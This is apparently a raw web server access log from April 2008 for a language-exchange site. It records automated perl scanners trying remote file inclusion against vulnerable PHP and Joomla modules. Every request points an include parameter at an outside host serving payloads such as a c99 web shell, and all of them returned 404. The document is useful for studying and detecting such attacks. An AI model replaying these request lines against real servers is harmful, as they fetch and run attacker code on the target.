64.22.89.194 - - [28/Apr/2008:05:51:12 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.44.147.74 - - [28/Apr/2008:05:51:16 -0700] "GET //amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://www.geocities.com/dayaku/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
84.243.253.159 - - [28/Apr/2008:05:52:20 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
217.160.184.74 - - [28/Apr/2008:05:52:51 -0700] "GET /logs/access_080225.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/cicir0x/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
217.160.184.74 - - [28/Apr/2008:05:52:51 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/cicir0x/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
217.160.184.74 - - [28/Apr/2008:05:53:57 -0700] "GET /logs/access_080211.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/cicir0x/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
64.22.89.194 - - [28/Apr/2008:05:56:58 -0700] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
213.176.161.208 - - [28/Apr/2008:05:57:01 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://channels.dal.net/racrew/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.176.161.208 - - [28/Apr/2008:05:57:02 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://channels.dal.net/racrew/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.176.161.208 - - [28/Apr/2008:05:57:02 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://channels.dal.net/racrew/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
74.53.197.2 - - [28/Apr/2008:05:57:16 -0700] "GET /logs/access_080211.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.53.197.2 - - [28/Apr/2008:05:57:16 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.53.197.2 - - [28/Apr/2008:05:57:17 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
200.125.192.60 - - [28/Apr/2008:05:57:18 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.125.192.60 - - [28/Apr/2008:05:57:18 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.125.192.60 - - [28/Apr/2008:05:57:19 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.125.192.60 - - [28/Apr/2008:05:57:27 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.125.192.60 - - [28/Apr/2008:05:57:27 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.125.192.60 - - [28/Apr/2008:05:57:27 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.125.192.60 - - [28/Apr/2008:05:57:40 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.125.192.60 - - [28/Apr/2008:05:57:40 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.125.192.60 - - [28/Apr/2008:05:57:41 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
207.44.147.74 - - [28/Apr/2008:05:58:18 -0700] "GET //oneadmin/photogallery/samplephotogallery.php?path[docroot]=http://www.geocities.com/dayaku/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
208.115.34.17 - - [28/Apr/2008:05:59:10 -0700] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
208.115.34.17 - - [28/Apr/2008:06:00:11 -0700] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
208.115.34.17 - - [28/Apr/2008:06:00:11 -0700] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
85.25.153.202 - - [28/Apr/2008:06:00:50 -0700] "GET /logs/access_071119.log//appserv/main.php?appserv_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
217.112.35.25 - - [28/Apr/2008:06:00:58 -0700] "GET /logs/access_071126.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.112.35.25 - - [28/Apr/2008:06:01:03 -0700] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.112.35.25 - - [28/Apr/2008:06:01:04 -0700] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
195.95.229.254 - - [28/Apr/2008:06:01:34 -0700] "GET /logs/access_071119.log//appserv/main.php?appserv_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
84.243.253.159 - - [28/Apr/2008:06:02:27 -0700] "GET /index.php?body=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.243.253.159 - - [28/Apr/2008:06:02:27 -0700] "GET /index.php?body=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.53.197.2 - - [28/Apr/2008:06:04:18 -0700] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
85.25.153.202 - - [28/Apr/2008:06:04:29 -0700] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.25.153.202 - - [28/Apr/2008:06:04:29 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.25.153.202 - - [28/Apr/2008:06:04:29 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.214.48.33 - - [28/Apr/2008:06:05:02 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.nextit.org/components/com_gigcal/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.1.202.61 - - [28/Apr/2008:06:05:15 -0700] "GET /logs/access_071112.log/index.php3?s=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
200.1.202.61 - - [28/Apr/2008:06:05:19 -0700] "GET /logs/index.php3?s=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.65.7.42 - - [28/Apr/2008:06:07:02 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://http://iulian.pokol.hu/iuli/rex1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
217.24.50.200 - - [28/Apr/2008:06:07:33 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.toulouseangloexchange.com"
195.95.229.254 - - [28/Apr/2008:06:07:44 -0700] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
195.95.229.254 - - [28/Apr/2008:06:07:44 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
195.95.229.254 - - [28/Apr/2008:06:07:45 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
83.65.7.42 - - [28/Apr/2008:06:08:07 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://http://iulian.pokol.hu/iuli/rex1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
84.243.253.159 - - [28/Apr/2008:06:10:03 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.243.253.159 - - [28/Apr/2008:06:10:03 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
69.61.37.54 - - [28/Apr/2008:06:10:11 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
69.61.37.54 - - [28/Apr/2008:06:10:11 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
83.65.7.42 - - [28/Apr/2008:06:10:27 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://http://iulian.pokol.hu/iuli/rex1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
84.243.253.159 - - [28/Apr/2008:06:10:41 -0700] "GET /logs/access_071126.log//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
92.48.75.104 - - [28/Apr/2008:06:10:42 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.thenationalcouncil.com/webcalendar/tools/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
92.48.75.104 - - [28/Apr/2008:06:10:42 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.thenationalcouncil.com/webcalendar/tools/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
85.214.48.33 - - [28/Apr/2008:06:11:01 -0700] "GET /logs/access_080225.log/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.nextit.org/components/com_gigcal/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.214.48.33 - - [28/Apr/2008:06:11:01 -0700] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.nextit.org/components/com_gigcal/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.178.225.70 - - [28/Apr/2008:06:11:22 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://echangeurfr.free.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.178.225.70 - - [28/Apr/2008:06:11:25 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://echangeurfr.free.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.178.225.70 - - [28/Apr/2008:06:11:28 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://echangeurfr.free.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.214.48.33 - - [28/Apr/2008:06:11:33 -0700] "GET /logs/access.log/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.nextit.org/components/com_gigcal/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.26.209.233 - - [28/Apr/2008:06:12:34 -0700] "GET /logs/access_080225.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.26.209.233 - - [28/Apr/2008:06:12:34 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.26.209.233 - - [28/Apr/2008:06:12:34 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.26.209.233 - - [28/Apr/2008:06:12:42 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
84.243.253.159 - - [28/Apr/2008:06:13:00 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.243.253.159 - - [28/Apr/2008:06:13:00 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
80.82.115.21 - - [28/Apr/2008:06:13:30 -0700] "GET /logs/access_080107.log//tools/send_reminders.php?noSet=0&includedir=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.82.115.21 - - [28/Apr/2008:06:13:30 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.82.115.21 - - [28/Apr/2008:06:13:31 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.82.115.21 - - [28/Apr/2008:06:13:35 -0700] "GET /logs/access_080121.log//tools/send_reminders.php?noSet=0&includedir=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.25.153.202 - - [28/Apr/2008:06:14:58 -0700] "GET /logs/access_080107.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
83.65.7.42 - - [28/Apr/2008:06:15:03 -0700] "GET /logs/access_080225.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://http://iulian.pokol.hu/iuli/rex1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
83.65.7.42 - - [28/Apr/2008:06:15:04 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://http://iulian.pokol.hu/iuli/rex1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
83.65.7.42 - - [28/Apr/2008:06:15:04 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://http://iulian.pokol.hu/iuli/rex1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
83.65.7.42 - - [28/Apr/2008:06:15:13 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://http://iulian.pokol.hu/iuli/rex1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
121.88.4.5 - - [28/Apr/2008:06:16:46 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
121.88.4.5 - - [28/Apr/2008:06:16:47 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
121.88.4.5 - - [28/Apr/2008:06:16:48 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
85.214.48.33 - - [28/Apr/2008:06:17:29 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.nextit.org/components/com_gigcal/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
195.95.229.254 - - [28/Apr/2008:06:18:01 -0700] "GET /logs/access_080107.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
84.243.253.159 - - [28/Apr/2008:06:19:09 -0700] "GET /logs/access_080211.log/proddetail.php?prod=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.243.253.159 - - [28/Apr/2008:06:19:09 -0700] "GET /logs/access_080211.log/proddetail.php?prod=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.243.253.159 - - [28/Apr/2008:06:19:09 -0700] "GET /logs/proddetail.php?prod=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.243.253.159 - - [28/Apr/2008:06:19:09 -0700] "GET /logs/proddetail.php?prod=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
121.88.4.5 - - [28/Apr/2008:06:19:17 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
121.88.4.5 - - [28/Apr/2008:06:19:17 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
121.88.4.5 - - [28/Apr/2008:06:19:19 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
200.1.202.61 - - [28/Apr/2008:06:19:25 -0700] "GET /logs/access_080225.log/index.php3?s=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.65.7.42 - - [28/Apr/2008:06:20:43 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://http://iulian.pokol.hu/iuli/rex1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
83.65.7.42 - - [28/Apr/2008:06:20:43 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://http://iulian.pokol.hu/iuli/rex1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
83.65.7.42 - - [28/Apr/2008:06:20:43 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://http://iulian.pokol.hu/iuli/rex1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
216.17.101.27 - - [28/Apr/2008:06:20:48 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.17.101.27 - - [28/Apr/2008:06:20:48 -0700] "GET //index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.17.101.27 - - [28/Apr/2008:06:20:49 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
212.116.174.9 - - [28/Apr/2008:06:20:58 -0700] "GET /logs/access_071126.log//appserv/main.php?appserv_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
82.194.86.113 - - [28/Apr/2008:06:21:01 -0700] "GET /logs/access_080225.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.194.86.113 - - [28/Apr/2008:06:21:01 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.194.86.113 - - [28/Apr/2008:06:21:01 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.194.86.113 - - [28/Apr/2008:06:21:02 -0700] "GET /logs/access_080225.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
212.116.174.9 - - [28/Apr/2008:06:21:02 -0700] "GET //appserv/main.php?appserv_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
212.116.174.9 - - [28/Apr/2008:06:21:02 -0700] "GET /logs/access_071126.log//appserv/main.php?appserv_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
82.194.86.113 - - [28/Apr/2008:06:21:02 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.194.86.113 - - [28/Apr/2008:06:21:02 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.26.209.233 - - [28/Apr/2008:06:21:03 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.26.209.233 - - [28/Apr/2008:06:21:04 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.26.209.233 - - [28/Apr/2008:06:21:04 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
212.116.174.9 - - [28/Apr/2008:06:21:05 -0700] "GET //appserv/main.php?appserv_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
212.116.174.9 - - [28/Apr/2008:06:21:05 -0700] "GET /logs//appserv/main.php?appserv_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
212.116.174.9 - - [28/Apr/2008:06:21:08 -0700] "GET /logs//appserv/main.php?appserv_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
83.18.104.114 - - [28/Apr/2008:06:21:22 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.thenationalcouncil.com/webcalendar/tools/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
